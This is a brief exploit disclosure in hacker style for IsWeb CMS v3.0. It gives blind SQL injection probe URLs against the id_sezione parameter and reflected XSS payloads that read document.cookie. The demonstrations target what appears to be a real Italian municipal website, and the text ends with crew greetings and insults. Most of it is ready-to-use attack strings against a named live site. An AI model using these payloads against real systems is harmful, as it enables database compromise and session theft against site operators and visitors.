[■] IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities >---------------------------------------< > AuToR: XaDoS (SecurityCode Team) > Contact M&: xados [at] hotmail [dot] it > B§g: Blind $ql inJection > SIte vuln: http://www.cmsisweb.it >---------------------------------------< [■] BlinD $qL: |: http://www.example.com/index.php?id_sezione=[$qL] > DeM0: |: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=4 [No] |: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=5 [Ye$] [■] XSS: |: http://www.comune.avezzano.aq.it/index.php?azione=cerca In this modul (search) write: "> or another vuln Page: |: http://www.comune.avezzano.aq.it/index.php?id_doc=19&id_oggetto=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20XaDoS%3Ch1%3E%3C/marquee%3E [■] Th4nKs:: \>Str0keFuck you 007 hackerSecuritycode teamAll italian hackers